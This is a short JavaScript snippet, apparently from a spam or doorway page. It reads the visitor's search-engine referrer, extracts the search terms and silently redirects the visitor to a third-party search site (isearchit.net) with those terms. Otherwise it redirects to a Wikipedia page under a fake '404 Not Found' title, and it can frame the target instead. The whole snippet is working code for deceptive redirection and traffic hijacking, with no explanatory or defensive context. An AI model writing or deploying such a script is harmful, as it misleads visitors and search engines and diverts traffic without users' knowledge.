var redir = 1;
    title_pg = '404 Not Found';
    alturl = "http://en.wikipedia.org/wiki/Dick's_Sporting_Goods";
    key = 'dicks sporting goods';
  var r = document.referrer, t ='', q, keyword, s, loc=escape(document.location); 
  if (r.indexOf("google.") != -1) { t = "q"; } 
  if (r.indexOf("msn.") != -1) { t = "q"; } 
  if (r.indexOf("live.") != -1) { t = "q"; }
  if (r.indexOf("yahoo.") !=- 1) { t = "p"; } 
  if (r.indexOf("altavista.") !=- 1) { t = "q"; } 
  if (r.indexOf("aol.") != -1) { t = "query"; } 
  if (r.indexOf("ask.") != -1) { t = "q"; } 
  if (t.length && ((q = r.indexOf("?"+t+"=")) != -1 || (q = r.indexOf("&"+t+"=")) != -1)) { 
    sekey = r.substring(q+2+t.length).split("&")[0]; 
    rs=escape(r);
    s = 'http://isearchit.net/search.php?q='+sekey; 
  } else { 
    s = alturl; 
    document.title=title_pg;
  } 
  if (s.length) { 
    if (redir == 1) {
      document.location = s;
    } else {
      document.writeln('<frameset frameborder="NO" border="0" framespacing="0">'); 
      document.writeln('<frame src="'+s+'" noresize>'); 
      document.writeln('</frameset>'); 
    }
  } 

